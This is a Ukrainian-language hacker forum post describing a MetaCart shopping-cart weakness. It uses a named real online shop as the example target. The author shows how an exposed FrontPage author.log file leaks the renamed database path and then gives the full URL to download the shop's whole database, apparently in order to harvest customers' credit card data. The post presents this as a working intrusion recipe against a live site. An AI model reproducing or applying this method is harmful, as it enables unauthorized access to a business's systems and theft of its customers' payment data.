уразливість metacart

Подорожуючи якось по інету натрапив я на невеликий такий інтернет-магазинчик, що торгує нехитрими цінностями американської демократії.
І виникла у мене думка дізнатися як часто вони проявляють патріотичні почуття, тим більше що, магазин приймає не тільки чеки але і сс.
Полазити по сайту я зрозумів, що магазин-то працює на системі metacart, але стандартні запити типу www.swimamerica.org/metacart/database/metacart.mdb або www.swimamerica.org/metacart/metacart.mdb не діяли.
Видно адмін змінив назву бази. Тоді вирішив я перевірити сайт на наявність дірявих скриптів, серйозних багів не виявилося, зате зустрівся дуже цікавий файл author.log (www.swimamerica.org/_vti_log/author.log - він досі там, де було багато сміття типу:
[18 Jun 2002 12:54:47 -0600] 66.176.193.110 asca / KJSwimAmerica [get document] kjsaabout.htm
[18 Jun 2002 12:55:47 -0600] 66.176.193.110 asca / KJSwimAmerica [get document] babieslearntofloat.htm
[18 Jun 2002 12:56:06 -0600] 66.176.193.110 asca / KJSwimAmerica [put document] babieslearntofloat.htm
[18 Jun 2002 12:56:15 -0600] 66.176.193.110 asca / KJSwimAmerica [get document] toddlerlessons.htm
[18 Jun 2002 12:56:29 -0600] 66.176.193.110 asca / KJSwimAmerica [put document] toddlerlessons.htm
[18 Jun 2002 12:56:40 -0600] 66.176.193.110 asca / KJSwimAmerica [get document] lessons.htm
[18 Jun 2002 12:57:18 -0600] 66.176.193.110 asca / KJSwimAmerica [put document] lessons.htm
[18 Jun 2002 12:57:29 -0600] 66.176.193.110 asca / KJSwimAmerica [get document] semiprivatelessons.htm
Але були і дуже цікаві рядки:
[19 Jun 2002 8:12:41 -0600] 66.176.193.110 asca / [get document] metacart / productsByCategory.asp
[19 Jun 2002 8:16:05 -0600] 66.176.193.110 asca / [get document] metacart / product.asp
[19 Jun 2002 8:32:29 -0600] 66.176.193.110 asca / [put document] metacart / database / mcart2.mdb
В останній як ви вже зрозуміли, вказані директорії і ім'я бази магазину: metacart / database / mcart2.mdb. Адмін видать не особливо гимора з назвою.
Залишилося ввести в браузер повний урл www.swimamerica.org/metacart/database/mcart2.mdb і чекати поки зіллється вся база.
Ось ніби і все.

Твій bug Durito.
_________________
EAT THE RICH!